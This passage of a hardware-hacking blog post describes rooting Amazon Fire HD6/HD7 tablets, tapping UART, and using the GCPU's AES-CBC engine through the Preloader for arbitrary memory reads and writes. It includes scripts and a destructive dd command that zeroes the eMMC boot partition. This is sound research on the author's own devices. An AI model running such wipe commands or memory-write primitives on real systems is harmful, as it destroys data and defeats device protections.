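info = parse_part_header(header)
print(info["name"], info["size"], hex(info["addr"]))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For this dump the size field decodes to 112816 bytes, which leaves exactly 512 bytes for the header out of the 113328 bytes that &lt;code&gt;dd&lt;/code&gt; copied.&lt;/p&gt;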
&lt;h2&gt;Rooting the device&lt;/h2&gt;
&lt;p&gt;To play it safe, I thought it would be best to root the device. Before acquiring it, I read XDA and informed myself about the available options.&lt;/p&gt;
&lt;p&gt;The latest versions of FireOS 5 are not rootable, but it&apos;s always possible to downgrade (without bricking) to FireOS 4.5.3 and root from there using KingoRoot (yes, I hate these one-click root solutions too; they are the worst).&lt;/p&gt;
&lt;p&gt;The problem with this method is that KingoRoot requires an internet connection. If you connect to some Wi-Fi while on 4.5.3, Amazon will &lt;strong&gt;automatically&lt;/strong&gt; (and &lt;strong&gt;instantly&lt;/strong&gt;) download a software update and subsequently install it, causing a &lt;strong&gt;hard brick&lt;/strong&gt; on the device (I&apos;m speaking from experience :D).&lt;/p&gt;
&lt;p&gt;To avoid this, I decided to sniff out and extract whatever KingoRoot&apos;s black magic is, and put everything together into a ZIP file to create a safe offline rooting method. This method directly installs SuperSU instead of the usual Chinese bloatware! I won&apos;t go into details here, but if you want to see how it works, check out &lt;a href=&quot;https://xdaforums.com/t/root-twrp-downgrade-fire-hd7-hd6-ariel.4676003&quot;&gt;this XDA thread&lt;/a&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;shell@ariel:/data/local/tmp $ su
root@ariel:/data/local/tmp # id
uid=0(root) gid=0(root) context=u:r:init:s0
root@ariel:/data/local/tmp #
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(&lt;em&gt;g0t r00t!&lt;/em&gt;)&lt;/p&gt;
&lt;h2&gt;Accessing UART&lt;/h2&gt;
&lt;p&gt;As I mentioned earlier, an XDA user had posted the TX location on the HD6 board a few years ago, which made my life easier.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd6-uart.jpeg&quot; width=&quot;400&quot; alt=&quot;TX on the HD6&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;I decided to open up my HD7 to try to solder the TX connection, allowing me to more easily debug amonet, as UART is usually necessary for this process. I opened the back of the device and the first thing I found was a completely different PCB layout, which scared the hell out of me. Did this mean that finding the TX would not be as easy as I had hoped?&lt;/p&gt;
&lt;p&gt;Thankfully, my fears were unfounded. In the picture posted by the XDA user, you could see that the TX was part of what looked like a JTAG test point labeled &lt;code&gt;JDEBUG1&lt;/code&gt;. After a quick inspection of my HD7 board, I noticed the same label was present so my partner helped me to solder the pin in the same position as shown in the XDA image.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd7-uart.jpg&quot; width=&quot;400&quot; alt=&quot;TX on the HD7&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;To be able to close the back of the tablet, we made a hole in the right side of the chassis and carefully passed both cables through it. The result was pretty solid, and it still holds up just fine as I&apos;m writing this article!&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd6-case.jpg&quot; width=&quot;400&quot; alt=&quot;UART setup HD7&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;I plugged in the device and... voilà! UART was working just fine, and I was able to read the output of &lt;code&gt;PL0&lt;/code&gt;, &lt;code&gt;PL1&lt;/code&gt; and the rest of the bootloader images:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[21:50:51.343] Waiting for tty device..
[21:50:56.839] Connected to /dev/ttyUSB0
[PL0] Build Time: 20140925-030705
[SD0] Bus Width: 1
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Accessing bootROM mode&lt;/h2&gt;
&lt;p&gt;Typically, on such devices, we&apos;d use the first stage of amonet, which exploits a vulnerability in bootROM to upload and execute custom payloads. However, to do this, we&apos;d need to access USBDL mode first, which is something nobody has been able to achieve on this particular device.&lt;/p&gt;
&lt;h3&gt;Volume keys&lt;/h3&gt;
&lt;p&gt;I decided to run &lt;code&gt;strings&lt;/code&gt; on the previously extracted &lt;code&gt;PL1&lt;/code&gt; image to check for any references to USBDL mode, and I found the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc:~$ strings PL1.img | grep -e &quot;emergency&quot; -e &quot;download&quot;
%s exit emergency dl mode due to time-out (%d ms, %d ms)
download keys are pressed
[RTC] clear emergency dl mode flag in rtc register
[RTC] emergency dl mode flag in rtc register is detected
%s emergency download mode(timeout: %ds).
[RTC] use pl dl mode for emergency dl mode
r0rt1z2@r0rt1z2-pc:~$
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Technically, if the image wasn&apos;t lying, this mode should be accessible through the volume rocker, similar to the first versions of the Fire 7 2015&apos;s Preloader. So, I decided to give it a try:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc:~$ lsusb | grep MT
Bus 003 Device 007: ID 0e8d:3000 MediaTek Inc. MT65xx Preloader
r0rt1z2@r0rt1z2-pc:~$ lsusb
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After a few tries, I concluded that no &lt;code&gt;MT6227&lt;/code&gt; device (which is what bootROM identifies as) showed up at all, only the Preloader, so this probably got patched by Amazon :(&lt;/p&gt;
&lt;h3&gt;Erasing Preloader from the eMMC&lt;/h3&gt;
&lt;p&gt;The next thing I tried was quite risky, but as we say in Spanish, &quot;&lt;em&gt;quien tenga miedo a morir, que no nazca&lt;/em&gt;&quot; (&lt;em&gt;those who fear death should not be born&lt;/em&gt;). It involves erasing &lt;code&gt;/dev/block/mmcblk0boot0&lt;/code&gt; so that bootROM fails to load the Preloader and falls back to USBDL mode:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;root@ariel:/ $ echo 0 &amp;gt; /sys/block/mmcblk0boot0/force_ro 
root@ariel:/ $ dd if=/dev/zero of=/dev/block/mmcblk0boot0 bs=512 count=8
8+0 records in
8+0 records out
4096 bytes transferred in 0.001 secs (4096000 bytes/sec)
root@ariel:/ $ echo -n EMMC_BOOT &amp;gt; /dev/block/mmcblk0boot0
root@ariel:/ $ reboot -p
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... and it booted back to the OS, as if nothing had happened! I double-checked &lt;code&gt;mmcblk0boot0&lt;/code&gt; and it remained intact, so... what exactly is going on here?&lt;/p&gt;
&lt;p&gt;After hours of research, I discovered that the &lt;code&gt;persisbackup&lt;/code&gt; partition seemed to contain factory logs from when the device was first programmed. This is what I found in them:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Boot Area Write protection [BOOT_WP]: 0x04
  Power ro locking: possible
  Permanent ro locking: possible
  partition 0 ro lock status: locked permanently
  partition 1 ro lock status: not locked
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looks like Amazon locked down the first stage of Preloader on purpose... but why? That&apos;s something I discovered after hard bricking my Fire HD6.&lt;/p&gt;
&lt;h3&gt;Shorting the eMMC&lt;/h3&gt;
&lt;p&gt;I really didn&apos;t want to go to this extreme, as I only had my first HD6 at the time, but I decided to be brave and disassemble the device. Considering this method is meant to work in 100% of cases unless USBDL mode was disabled, I wondered: this is a 2014 device—did Amazon really disable it, like on newer models?&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/ifixit-hd6.jpeg&quot; alt=&quot;iFixit HD6 motherboard&quot; /&gt;&lt;/p&gt;
&lt;p&gt;As seen in the picture (courtesy of iFixit), everything is protected (or covered) by a soldered metal shield, so I had to use my soldering iron. Since I&apos;m not very skilled at soldering, I asked my partner, who has excellent soldering skills, to help me with this.&lt;/p&gt;
&lt;p&gt;The result was fairly good, except for the fact that we accidentally ripped off what seemed to be a capacitor related to the screen.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd6-result.png&quot; alt=&quot;HD6 motherboard&quot; /&gt;&lt;/p&gt;
&lt;p&gt;After that, I started playing the lottery (a very bad mistake—DON&apos;T ever try this at home) with what I thought could be &lt;code&gt;CLK&lt;/code&gt;, &lt;code&gt;CMD&lt;/code&gt;, or even &lt;code&gt;DAT0&lt;/code&gt;. Unfortunately, after a few shorts, I ended up killing the device to the point where it wouldn&apos;t even try to boot. So, there goes my first unit :D&lt;/p&gt;
&lt;h3&gt;UART. What&apos;s going on?&lt;/h3&gt;
&lt;p&gt;Since we had already found TX (which is enough to read &lt;strong&gt;UART&lt;/strong&gt; logs), I decided to see what was happening when trying to access USBDL mode, either by shorting or using the volume rocker. Here&apos;s what I discovered:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;key 1 is pressed
[LIB] invalid susbdl config &apos;0xEA000007&apos;
&amp;lt;ASSERT&amp;gt; seclib_dl.c:line 62 0
[PLFM] preloader fatal error...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That&apos;s what happens when you press the volume down key while connecting the device to the PC. Apparently, the Preloader detects the key press and triggers an assert, which should cause a reboot to bootROM mode. Unfortunately, in my case, it rebooted normally  :(&lt;/p&gt;
&lt;h2&gt;Exploiting the Preloader&lt;/h2&gt;
&lt;p&gt;Having concluded that USBDL mode was not accessible, I decided to focus on exploiting the Preloader to gain arbitrary code execution and subsequently upload my own payloads.&lt;/p&gt;
&lt;p&gt;Since we know that both the Preloader and bootROM support the same commands, I decided to use the same method as the one employed for the Fire HD8 2018, which exploited the GCPU to read and write memory addresses arbitrarily.&lt;/p&gt;
&lt;p&gt;My initial goal was to dump the bootROM, but as you&apos;ll see later, I failed miserably. However, I did manage to achieve code execution in the Preloader, which is a significant result nonetheless. :)&lt;/p&gt;
&lt;h3&gt;What&apos;s bootROM?&lt;/h3&gt;
&lt;p&gt;After the CPU initializes, the internal SRAM controller pushes a jump instruction to the bootROM address. This is the first code that runs on the device, and it can&apos;t be modified. The bootROM takes care of initializing basic hardware such as flash storage, UART1 (the first serial port), loading the Preloader into the On-Chip SRAM, and jumping to it.&lt;/p&gt;
&lt;p&gt;While bootROM is usually located at &lt;code&gt;0x0&lt;/code&gt;, there are certain cases where that address contains a direct jump to either &lt;code&gt;0x00400000&lt;/code&gt; or &lt;code&gt;0x48000000&lt;/code&gt;, as seen in &lt;a href=&quot;https://github.com/chaosmaster/bypass_payloads/blob/master/generic_dump.c#L5&quot;&gt;&lt;code&gt;bypass_payloads&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc:~ $ hexdump -C 6572_0x0.bin | head -n 1
00000000  04 f0 1f e5 00 00 40 00  00 00 00 00 00 00 00 00  |......@.........|
r0rt1z2@r0rt1z2-pc:~ $ 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As seen above, the MT6572 dump starts with &lt;code&gt;04 f0 1f e5&lt;/code&gt;, which decodes (HEX -&amp;gt; ARM) to &lt;code&gt;LDR pc, [pc, #-4]&lt;/code&gt;. In ARM state, reading PC yields the address of the current instruction plus 8, so for an instruction at &lt;code&gt;0x0&lt;/code&gt; this loads the word stored at &lt;code&gt;0x4&lt;/code&gt; into the program counter (PC). Since that word is &lt;code&gt;0x00400000&lt;/code&gt; (stored little-endian as &lt;code&gt;00 00 40 00&lt;/code&gt;), the instruction effectively redirects execution to the actual bootROM code.&lt;/p&gt;
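&lt;p&gt;The arithmetic can be checked in a couple of lines. A minimal sketch, assuming ARM state (where reading PC yields the address of the current instruction plus 8) and using only the 16 bytes shown in the hexdump; the variable names are mine.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# First 16 bytes of the MT6572 dump at 0x0, copied from the hexdump above.
dump = bytes.fromhex("04f01fe5000040000000000000000000")

insn_addr = 0x0              # where the LDR instruction lives
pc_value = insn_addr + 8     # in ARM state, PC reads as current instruction + 8
literal_addr = pc_value - 4  # the "#-4" offset encoded in the instruction

# The word stored there is little-endian and becomes the new PC.
target = int.from_bytes(dump[literal_addr:literal_addr + 4], "little")
print(f"literal at 0x{literal_addr:x}, jump target 0x{target:08x}")
&lt;/code&gt;&lt;/pre&gt;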
&lt;p&gt;Dumping bootROM is no easy task, as it requires you to do so within a privileged context. To understand what I mean, let&apos;s take a look at the ARM developer documentation:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In the ARMv7 architecture, the processor mode can change under privileged software control or automatically when taking an exception. When an exception occurs, the core saves the current execution state and the return address, enters the required mode, and possibly disables hardware interrupts.&lt;/p&gt;
&lt;p&gt;Applications operate at the lowest level of privilege, PL0, previously unprivileged mode. Operating systems run at PL1, and the Hypervisor in a system with the Virtualization extensions at PL2. The Secure monitor, which acts as a gateway for moving between the Secure and Non-secure (Normal) worlds, also operates at PL1.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/arm-privileges.png&quot; alt=&quot;ARMv7 privilege levels&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;To make things easier to understand, let&apos;s just say that on the MT8135, which is ARMv7-based, both the Preloader and the TEE run at the most privileged state. Meanwhile, the Little Kernel (second bootloader) and the kernel operate at a lower privilege level.&lt;/p&gt;
&lt;h3&gt;Understanding the GCPU exploit&lt;/h3&gt;
&lt;p&gt;The GCPU is a SoC peripheral designed for decrypting encrypted media, featuring a microcontroller core (Control CPU or CCPU) equipped with ROM, SRAM, and hardware accelerators for AES, SHA, MD5, RC4, DES, and CRC32, as well as DMA.&lt;/p&gt;
&lt;p&gt;The Control CPU (its microcontroller core) operates with a 22-bit instruction set and includes 32 general-purpose 32-bit registers, instruction ROM, instruction RAM, and data RAM.&lt;/p&gt;
&lt;p&gt;Direct interaction with the GCPU is achieved by writing to its memory-mapped registers within the SoC&apos;s address space. During the boot process, at least on Amazon devices, both the Preloader and the LK (bootloader) use the GCPU to verify the integrity of the images before loading them into memory. As usual, further reverse engineering of this process can provide deeper insights into the GCPU&apos;s functionality :)&lt;/p&gt;
&lt;p&gt;In my first attempts to dump bootROM, I didn&apos;t have arbitrary code execution capabilities in the LK. Thus, my access to the GCPU was solely through the Preloader.&lt;/p&gt;
&lt;p&gt;For my device, an older Preloader version exposed two commands to read and write memory addresses within a predefined range: &lt;code&gt;CMD_READ32&lt;/code&gt; and &lt;code&gt;CMD_WRITE32&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;As seen in the amonet source code, these can be used to read from and write to the GCPU&apos;s registers, and thus trigger cryptographic operations.&lt;/p&gt;
&lt;p&gt;To grasp how bootROM data was successfully dumped back then, we need to delve into the intricacies of &lt;strong&gt;AES-CBC&lt;/strong&gt; (Cipher Block Chaining) mode utilized during the decryption processes.&lt;/p&gt;
&lt;h3&gt;Reading data&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;AES-CBC&lt;/strong&gt; mode is a common encryption technique where data is encrypted block by block. Each block of data is &lt;strong&gt;XORed&lt;/strong&gt; with the ciphertext of the previous block before it is encrypted.&lt;/p&gt;
&lt;p&gt;During decryption, each block of ciphertext is decrypted and then XORed with the previous block&apos;s ciphertext to reconstruct the plaintext.  The very first block, however, uses an Initialization Vector (IV) in place of previous ciphertext, setting the stage for the encryption or decryption sequence.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/aes-cbc.png&quot; alt=&quot;AES CBC&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In this scenario, the attacker sets the &lt;strong&gt;IV&lt;/strong&gt; to zero. With a zero IV, the XOR step for the first block changes nothing, so the output for that block is exactly what the AES decryption produced, without any extra masking.&lt;/p&gt;
&lt;p&gt;For example, let&apos;s consider a situation where at address &lt;code&gt;0x0&lt;/code&gt; the data looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0xDEADBEEFCAFEBABE13371337DEADBEEFCAFEBABE13371337DEADBEEFCAFEBABE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This data represents two blocks of encrypted information (16 bytes each, given typical AES block size). If we set the IV to zero, the decryption would proceed as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Decryption of the first block:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ciphertext Block (C1)&lt;/strong&gt;: &lt;code&gt;DEADBEEFCAFEBABE13371337DEADBEEF&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;IV&lt;/strong&gt;: &lt;code&gt;00000000000000000000000000000000&lt;/code&gt; (set to zero)&lt;/li&gt;
&lt;li&gt;Assume the AES decryption of &lt;strong&gt;C1&lt;/strong&gt; produces a block we&apos;ll call &lt;strong&gt;D1&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Plaintext Result (P1)&lt;/strong&gt;: Since the &lt;strong&gt;IV&lt;/strong&gt; is zero, &lt;strong&gt;P1&lt;/strong&gt; is equal to &lt;strong&gt;D1&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;(Normally, you&apos;d see an &lt;strong&gt;XOR&lt;/strong&gt; step here, but with an &lt;strong&gt;IV&lt;/strong&gt; of zero, it simply doesn&apos;t alter the output)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Decryption of the second block:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ciphertext Block (C2)&lt;/strong&gt;: &lt;code&gt;CAFEBABE13371337DEADBEEFCAFEBABE&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;IV&lt;/strong&gt;: &lt;code&gt;DEADBEEFCAFEBABE13371337DEADBEEF&lt;/code&gt; (previous ciphertext block)&lt;/li&gt;
&lt;li&gt;Assume the AES decryption of &lt;strong&gt;C2&lt;/strong&gt; produces a block we&apos;ll call &lt;strong&gt;D2&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Plaintext Result (P2)&lt;/strong&gt;: The decrypted output &lt;strong&gt;D2&lt;/strong&gt; is XORed with the previous ciphertext &lt;strong&gt;C1&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;(The &lt;strong&gt;XOR&lt;/strong&gt; operation mixes &lt;strong&gt;D2&lt;/strong&gt; with the first block&apos;s ciphertext, revealing the plaintext for this block)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the &lt;strong&gt;IV&lt;/strong&gt; set to zero, the first block&apos;s plaintext is directly revealed, and each subsequent block&apos;s decryption is influenced by the ciphertext of the block before it. This is essentially what allowed xyz to dump the bootROM in chunks of 16 bytes at a time, since one could read out the generated plaintext after the first block was decrypted.&lt;/p&gt;
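&lt;p&gt;The chaining itself is easy to reproduce on a PC. The sketch below is not AES: &lt;code&gt;toy_decrypt_block&lt;/code&gt; is a made-up, keyless stand-in for the block decryption, used only so the example runs with the standard library. What it does show faithfully is the CBC structure: with a zero IV, P1 equals D1, and P2 equals D2 XORed with C1.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;BLOCK = 16


def toy_decrypt_block(block):
    """Stand-in for AES block decryption (NOT real AES, illustration only)."""
    return bytes((b + 0x5A) % 256 for b in reversed(block))


def xor(a, b):
    """Byte-wise XOR of two equally sized buffers."""
    return bytes(x ^ y for x, y in zip(a, b))


def cbc_decrypt(ciphertext, iv):
    """Plain CBC decryption: P[i] = D(C[i]) xor C[i-1], with C[-1] = IV."""
    plaintext, previous = b"", iv
    for off in range(0, len(ciphertext), BLOCK):
        block = ciphertext[off:off + BLOCK]
        plaintext += xor(toy_decrypt_block(block), previous)
        previous = block
    return plaintext


c1 = bytes.fromhex("DEADBEEFCAFEBABE13371337DEADBEEF")
c2 = bytes.fromhex("CAFEBABE13371337DEADBEEFCAFEBABE")
plain = cbc_decrypt(c1 + c2, iv=bytes(BLOCK))

d1, d2 = toy_decrypt_block(c1), toy_decrypt_block(c2)
print(plain[:BLOCK] == d1)           # zero IV: P1 is exactly D1
print(plain[BLOCK:] == xor(d2, c1))  # P2 is D2 xor C1
&lt;/code&gt;&lt;/pre&gt;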
&lt;h3&gt;Writing data&lt;/h3&gt;
&lt;p&gt;A similar process can be used to arbitrarily write data to memory in chunks of &lt;strong&gt;16 bytes&lt;/strong&gt; using &lt;strong&gt;AES-CBC&lt;/strong&gt; mode. In order to achieve this, a fixed pattern is defined for XOR operations:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pattern = bytes.fromhex(&quot;4dd12bdf0ec7d26c482490b3482a1b1f&quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This pattern is used to manipulate the data before it&apos;s actually processed by the AES decryption function. Following that, the 16 bytes of data are split into four 4-byte (32-bit) words.&lt;/p&gt;
&lt;p&gt;Each word is XORed with the corresponding word from the pattern. This XOR operation prepares the data in such a way that, when decrypted, it will result in the desired plaintext.&lt;/p&gt;
&lt;p&gt;In addition to that, the source address for the operation is set to 0, which has to be a valid address containing all zeroes. The destination address is set to the target address &lt;code&gt;addr&lt;/code&gt;, where the data should be written to. Lastly, another AES decryption gets triggered, which writes the manipulated data to the target address.&lt;/p&gt;
&lt;p&gt;For example, let&apos;s assume the attacker wants to write the following 16 bytes of data to the target address &lt;code&gt;0x1000&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0xCAFEBABE13371337DEADBEEFCAFEBABE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This data represents 16 bytes of information. If we follow the process outlined above, the data is manipulated as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Split the data into four 4-byte words:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;0xCAFEBABE&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0x13371337&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xDEADBEEF&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xCAFEBABE&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Each word is XORed with the corresponding word from the pattern:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;0xCAFEBABE&lt;/code&gt; ^ &lt;code&gt;0x4dd12bdf&lt;/code&gt; = &lt;code&gt;0x872f9161&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0x13371337&lt;/code&gt; ^ &lt;code&gt;0x0ec7d26c&lt;/code&gt; = &lt;code&gt;0x1df0c15b&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xDEADBEEF&lt;/code&gt; ^ &lt;code&gt;0x482490b3&lt;/code&gt; = &lt;code&gt;0x96892e5c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xCAFEBABE&lt;/code&gt; ^ &lt;code&gt;0x482a1b1f&lt;/code&gt; = &lt;code&gt;0x82d4a1a1&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The source address for the AES operation is set to 0, and the destination address is set to &lt;code&gt;0x1000&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;By triggering the AES decryption, the XORed data gets transformed back to the original plaintext and written to the target address.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
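&lt;p&gt;The XOR step from the list above can be reproduced directly. A minimal sketch: the last two lines rest on my assumption (not spelled out above) that the pattern is what the engine outputs when it decrypts the all-zero source block, and that the XORed words act as the IV, so the final CBC XOR cancels the pattern out again.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pattern = bytes.fromhex("4dd12bdf0ec7d26c482490b3482a1b1f")
data = bytes.fromhex("cafebabe13371337deadbeefcafebabe")


def xor(a, b):
    """Byte-wise XOR of two equally sized buffers."""
    return bytes(x ^ y for x, y in zip(a, b))


# Steps 1 and 2: XOR the payload with the pattern, then view it as four words.
mixed = xor(data, pattern)
words = [mixed[i:i + 4].hex() for i in range(0, 16, 4)]
print(words)

# Assumption: decrypting the zero block yields the pattern and the mixed words
# are used as the IV, so the value that lands at the destination is
# pattern xor mixed.
written = xor(pattern, mixed)
print(written == data)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The four words printed match the values worked out by hand in the list above.&lt;/p&gt;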
&lt;h3&gt;My failed attempt to dump bootROM&lt;/h3&gt;
&lt;p&gt;I tried to replicate the same method on my device, but by using the Preloader&apos;s &lt;code&gt;CMD_READ32&lt;/code&gt; command to read the GCPU&apos;s registers. While I was able to read and write GCPU registers, and I could even execute cryptographic operations, every time I tried to read &lt;code&gt;0x0&lt;/code&gt;, the IV came out as zero :(&lt;/p&gt;
&lt;p&gt;After realizing I couldn&apos;t read anything from &lt;code&gt;0x0&lt;/code&gt;, I started to think that the second stage of the Preloader, which I&apos;m targeting, might be running under an insufficiently privileged context and the GCPU somehow knew that.&lt;/p&gt;
&lt;p&gt;In any case, I wrote a simple script that walks through memory in fixed steps, attempts a read at each address, and logs every result that isn&apos;t all zeros:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;with open(&quot;test.txt&quot;, &apos;w&apos;) as f:
    address = 0x0
    step_size = 0x1000
    try:
        while True:
            data = dev.aes_read16(address)
            if data.hex() != &apos;00000000000000000000000000000000&apos;:
                output = f&apos;aes16_read @ 0x{address:08x} = {data.hex()}&apos;
                print(output)
                f.write(output + &apos;\n&apos;)
            address += step_size
    except KeyboardInterrupt:
        print(f&apos;Last address: 0x{address:08x} (data: {data.hex()})&apos;)
&lt;/code&gt;&lt;/pre&gt;
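&lt;p&gt;I left the script dumping memory overnight, and when I woke up I found that it had crashed after reaching &lt;code&gt;0xffff0000&lt;/code&gt;, because the loop has no upper bound and the address eventually stopped fitting in a 32-bit word:&lt;/p&gt;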
&lt;pre&gt;&lt;code&gt;Current address: 0xffff0000, Block data: 00000000000000000000000000000000
Traceback (most recent call last):
  File &quot;/home/r0rt1z2/amonet/modules/main.py&quot;, line 204, in &amp;lt;module&amp;gt;
    main(dev, args)
  File &quot;/home/r0rt1z2/amonet/modules/main.py&quot;, line 39, in main
    data = dev.aes_read16(address)
           ^^^^^^^^^^^^^^^^^^^^^^^
  File &quot;/home/r0rt1z2/amonet/modules/common.py&quot;, line 222, in aes_read16
    self.write32(CRYPTO_BASE + 0xC04, addr)
  File &quot;/home/r0rt1z2/amonet/modules/common.py&quot;, line 171, in write32
    self.dev.write(struct.pack(&quot;&amp;gt;I&quot;, word))
                   ^^^^^^^^^^^^^^^^^^^^^^^
struct.error: &apos;I&apos; format requires 0 &amp;lt;= number &amp;lt;= 4294967295
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, when I opened the file I found out it had actually dumped a lot of memory! Apparently, it started dumping from &lt;code&gt;0x80000000&lt;/code&gt; and stopped when it reached &lt;code&gt;0xffff0000&lt;/code&gt;.&lt;/p&gt;
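&lt;p&gt;In hindsight, bounding the loop to the 32-bit address space would have avoided the exception. A small sketch of the same scan with an explicit upper limit; &lt;code&gt;scan&lt;/code&gt; and the fake reader used to exercise it are hypothetical, and on the real device the callback would be &lt;code&gt;dev.aes_read16&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ADDRESS_SPACE = 2**32  # addresses must fit in an unsigned 32-bit word


def scan(read16, start=0x0, end=ADDRESS_SPACE, step=0x1000):
    """Yield (address, data) for every probed chunk that is not all zeros."""
    for address in range(start, min(end, ADDRESS_SPACE), step):
        data = read16(address)
        if any(data):
            yield address, data


def fake_read16(address):
    """Made-up test double: only 0x80000000 and above returns data."""
    readable = address in range(0x80000000, ADDRESS_SPACE)
    return b"\xaa" * 16 if readable else bytes(16)


hits = list(scan(fake_read16, start=0x7FFFE000, end=0x80002000))
for address, data in hits:
    print(f"aes16_read @ 0x{address:08x} = {data.hex()}")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because the range stops at the end of the address space, the scan simply finishes instead of handing an out-of-range value to &lt;code&gt;struct.pack&lt;/code&gt;.&lt;/p&gt;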
&lt;h3&gt;Uploading my own payload&lt;/h3&gt;
&lt;p&gt;After failing to dump bootROM, I decided to try to upload my own payload to the device. The first thing I did was to reverse engineer the Preloader to see how it handled Download Agents, since that was the only way to jump to something from the Preloader.&lt;/p&gt;
&lt;p&gt;To understand how it works, let&apos;s take a look at the &lt;code&gt;usbdl_handler&lt;/code&gt; function, which manages USB communication.&lt;/p&gt;
&lt;p&gt;The device waits for a specific magic sequence from the host to stay in Preloader mode and accept instructions. If the magic sequence isn&apos;t received within a set timeout, the device continues with the normal boot process.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int usbdl_handler(bldr_comport *comport, uint32_t hshk_tmo_ms) {
    memcpy(startcmd_, startcmd, 4);
    start = get_timer(0);
    comm = comport-&amp;gt;ops;
    uVar6 = 0;
    len32 = len32 &amp;amp; 0xffffff00;

    /*
     * handshake process begins here, the host has a few
     * seconds to send the magic sequence so the device
     * stays in Preloader mode and listens for commands.
     */
    while (true) {
        platform_wdt_kick();
        usbdl_get_byte(&amp;amp;cmd);

        if (cmd != 0xfe) {
            usbdl_put_byte(cmd); // echo back
        }
        // ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the magic sequence is received, the device enters a loop, continuously listening for instructions from the host. If we take a look at some of the leaked BSPs, we&apos;ll find a list of commands that the Preloader supports.&lt;/p&gt;
